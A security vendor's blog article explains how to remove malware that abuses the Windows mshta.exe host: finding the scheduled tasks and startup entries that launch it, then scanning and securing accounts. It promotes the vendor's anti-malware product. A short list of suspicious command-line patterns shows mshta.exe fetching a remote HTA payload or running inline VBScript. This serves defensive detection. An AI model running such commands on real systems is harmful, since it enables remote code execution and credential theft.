mshta.exe Malware Removal: Blank Window and Scheduled Task Fix

Stephanie Adlam
Stephanie Adlam
10 Min Read
mshta.exe malware removal poster showing a scheduled task launching the Windows HTML Application Host.
mshta.exe malware removal starts by finding the scheduled task, startup entry, or script that launches the legitimate Windows host.

mshta.exe is usually a legitimate Windows component, not the malware itself. The danger starts when a scheduled task, startup entry, browser-delivered command, fake update page, or script uses mshta.exe to launch a remote HTA file or hidden JavaScript/VBScript. Do not delete C:\Windows\System32\mshta.exe or C:\Windows\SysWOW64\mshta.exe. Find and remove the launcher that keeps calling it.

If you are checking an unknown executable rather than a Windows-signed system component, the Tin.exe safety guide shows how to weigh file path, publisher signature, startup persistence, and scan results before deleting it.

For unknown VBS startup entries, use the same path, hash, and autostart-entry approach in the sdaCollector.vbs safety checklist. If the suspicious launcher calls Microsoft .NET tooling instead, the RegAsm.exe safe path and malware signs guide shows what to check before deleting anything.

Quick checks for mshta.exe malware removal

  • Check the path first. Microsoft-signed copies in C:\Windows\System32 and C:\Windows\SysWOW64 are expected. A copy in Downloads, Temp, AppData, or a random folder is suspicious.
  • Check the command line. Treat mshta.exe followed by a URL, obfuscated script, encoded text, or a strange local .hta file as a strong lead.
  • Look for persistence. Task Scheduler, Startup Apps, Run keys, browser extensions, notification permissions, and recently installed apps are common places to inspect.
  • Scan and verify. Use Gridinsoft Anti-Malware after saving the alert details, then reboot and confirm that the blank window or outbound block does not return.
Process name mshta.exe, Microsoft HTML Application Host
Normal location C:\Windows\System32\mshta.exe or C:\Windows\SysWOW64\mshta.exe
Suspicious sign Remote URL, hidden script, recurring blank window, blocked outbound connection, or task that relaunches it
Best first action Do not delete the Windows file. Identify the parent process, task, startup item, or browser source.

Is mshta.exe a virus?

No, the normal Windows copy of mshta.exe is not a virus. It is the Microsoft HTML Application Host, used to run HTA applications. Security teams still watch it closely because attackers can abuse it as a trusted Windows utility to run malicious HTA, JavaScript, or VBScript content. MITRE tracks this abuse as System Binary Proxy Execution: Mshta and notes that mshta.exe can execute local files, inline scripts, and remote URLs [1].

That distinction matters. If a firewall, antivirus, or another security tool says mshta.exe is involved, the file path alone is not enough. The command line, parent process, network destination, and repeat pattern tell you whether a legitimate Windows binary is being used by malware.

Why mshta.exe can create a blank window

A blank mshta.exe window often appears when the launcher still exists but the remote HTA page, payload, or script it tries to load is gone. The scheduled task or startup command fires, mshta.exe opens, and the content fails to load. That is why the window can come back every few hours even after a scanner removed a downloaded payload.

MSHTA abuse commonly appears in fake CAPTCHA, fake download, loader, and infostealer chains because attackers can call a trusted Windows binary instead of dropping an obvious executable first. For home users, the practical takeaway is simple: a recurring mshta.exe symptom is usually a launcher problem, not a reason to delete Windows files.

How to remove mshta.exe malware safely

  1. Save the alert details. Note the time, path, command line, parent process, blocked domain or IP, and the user account. If a security tool shows Behavior:Win32/Interhta.Int or another script-behavior alert, keep the item quarantined while you investigate.
  2. Verify the file path and signature. Right-click the process or file, open its location, and check Properties. A Microsoft-signed file in System32 or SysWOW64 is expected; a lookalike in a user folder is not.
  3. Inspect Task Scheduler. Look for recently created tasks, random names, tasks that run at logon or every few minutes, and actions that call mshta.exe, powershell.exe, wscript.exe, cmd.exe, a URL, or a script in AppData/Temp.
  4. Check startup and browser sources. Review Startup Apps, installed apps, browser extensions, notification permissions, and recent downloads. Fake updates and ClickFix pages often start in the browser before they create persistence.
  5. Use Autoruns for a broader view. Microsoft Sysinternals Autoruns can show logon entries, scheduled tasks, services, browser helper objects, and other autorun points in one place [2]. Disable only entries you can tie to the symptom or a known unwanted app.
  6. Run a full malware scan and cleanup. Use Gridinsoft Anti-Malware to detect and remove the malicious script, loader, browser hijacker, scheduled-task entry, or unwanted app that is calling mshta.exe. Reboot after cleanup.
  7. Confirm it is gone. After reboot, reconnect to the internet and wait through the previous trigger interval. The blank window, security alert, or outbound block should not return.

How Gridinsoft helps block and treat mshta.exe abuse

Gridinsoft Anti-Malware is useful in two parts of this incident: prevention and treatment. With real-time protection enabled, it can stop suspicious downloads, malicious scripts, loaders, browser hijackers, and other components that try to start a chain through mshta.exe, PowerShell, or scheduled tasks. If the chain already ran, the full scan is the treatment step: it checks common persistence points, detects the dropped payload or unwanted app, and removes the entries that keep relaunching the blank window or outbound connection.

Use the Gridinsoft Online Virus Scanner for a suspicious file before execution, and use Gridinsoft Anti-Malware when the system already shows recurring mshta.exe activity, security warnings, blank windows, or blocked outbound traffic.

Run a full system scan after manual cleanup.

After uninstalling the suspicious app or deleting the visible threat, use Gridinsoft Anti-Malware to check hidden files, startup entries, scheduled tasks, bundled apps, browser changes, and other persistence points that can restore malware.

Download Anti-Malware

For a domain-specific example of a browser tab opened by cmd.exe, see the Pop-broker.com redirect cleanup guide; it focuses on fake updater tasks such as GoogleUpdateDaily.

Where to look for the launcher

Task Scheduler Tasks with random names, hidden actions, logon triggers, or commands that call mshta.exe with a URL. If the launcher is an unknown executable such as RuntimesHost.exe instead, use the RuntimesHost scheduled-task cleanup guide to remove that exact persistence pattern.
Startup folders and Run keys Entries pointing to AppData, Temp, Downloads, scripts, or unknown helper apps.
Browser extensions and notifications Extensions or allowed notification sites added around the time the popups started.
Recent downloads Cracks, mods, fake updates, fake installers, ZIP archives, password-protected archives, or copied commands.
Security logs Security-tool history, firewall blocks, EDR alerts, and outbound destination details.

Suspicious mshta.exe command lines

Legitimate HTA use is uncommon on most home PCs. Treat these patterns as suspicious until proven otherwise:

mshta.exe http://example[.]com/payload.hta
mshta.exe https://example[.]com/file.mp4
mshta.exe vbscript:Execute(...)
mshta.exe javascript:...
C:\Users\...\AppData\...\mshta.exe

A remote URL after mshta.exe is especially important. So is a command that starts from a scheduled task, a fake update page, a cracked installer, or a script that also launches PowerShell outbound connections. If you saw the issue after a game mod, crack, private build, fake Chrome update, or copied Run command, also follow the account-safety steps in our infostealer cleanup guide.

What not to do

  • Do not delete the System32 or SysWOW64 copy just because it appeared in Task Manager. That can damage Windows behavior and does not remove the launcher.
  • Do not restore quarantined items to “test” whether the alert was real. Save the details first, then scan and verify.
  • Do not allow a blocked outbound connection only to stop notifications. The block is useful evidence.
  • Do not reinstall Windows immediately unless cleanup fails, system files are damaged, or credential theft risk is high. Check persistence first.

After cleanup: accounts and prevention

If the mshta.exe event followed a fake CAPTCHA, fake update, pirated installer, cracked game, Discord/Telegram lure, or suspicious archive, assume an infostealer may have run. Clean the PC first. Then use a clean device to change email, Microsoft, Google, banking, crypto, gaming, and messaging passwords. Revoke active sessions where possible and enable MFA.

For prevention, keep Windows and browsers updated, avoid copied Run/PowerShell commands from websites, do not install cracked software, and treat sudden “verify you are human” instructions that ask for Win + R as hostile. Keep Gridinsoft Anti-Malware real-time protection enabled so suspicious downloads and script-based launch chains are blocked before they become a recurring cleanup problem.

FAQ

Should I delete mshta.exe from System32?

No. The normal Microsoft-signed mshta.exe in C:\Windows\System32 or C:\Windows\SysWOW64 is a Windows component. Remove the task, script, browser entry, or unwanted app that launches it.

Why does a blank mshta.exe window keep popping up?

Most recurring blank windows come from a scheduled task or startup command that still calls mshta.exe. The remote payload may be offline, but the launcher remains and keeps opening an empty host window.

Is Behavior:Win32/Interhta.Int the same thing as mshta.exe malware?

It is related but more specific. Behavior:Win32/Interhta.Int is a script-behavior alert that often appears when suspicious activity uses mshta.exe. This page covers the broader process/symptom cleanup lane.

Can mshta.exe steal passwords?

mshta.exe itself is only the host. The script or payload it launches can download stealers, loaders, or remote commands. If the event followed a fake update, crack, or copied command, clean the PC and secure accounts from a clean device.

Related startup-file case: if the suspicious startup item is not mshta.exe but a numbered file such as eld4.exe in AppData/Local/Temp, treat it as a separate Temp-loader cleanup path.

References

  1. MITRE ATT&CK. “System Binary Proxy Execution: Mshta (T1218.005).” MITRE, accessed May 26, 2026. https://attack.mitre.org/techniques/T1218/005/
  2. Microsoft Sysinternals. “Autoruns for Windows.” Microsoft Learn, accessed May 26, 2026. https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
7-Zip CVE-2026-48095 Fix
Vulnerability in KeePass Allows Stealing All User Passwords in Plain Text
Weak Block Cipher in Microsoft Office 365 Leads to Message Content Disclosure
FedEx e-Order Virus
ML/Augur Alert: False Positive or Malware?
TAGGED:
Share This Article
ByStephanie Adlam
Follow:
Stephanie is our wordsmith, transforming technical research into engaging content that resonates with users. Her expertise in cybercrime prevention and online safety ensures that Gridinsoft's advice is accessible to everyone—whether they’re tech-savvy or not.
Previous Article Megalodon GitHub Actions malware shown as a CI backdoor entering a software pipeline. Megalodon GitHub Actions Malware
Next Article TrapDoor packages pulling developer keys and tokens into an open trapdoor TrapDoor Hits npm, PyPI and Crates.io With AI Config Poisoning
Leave a Comment

AI Assistant

Hello! 👋 How can I help you today?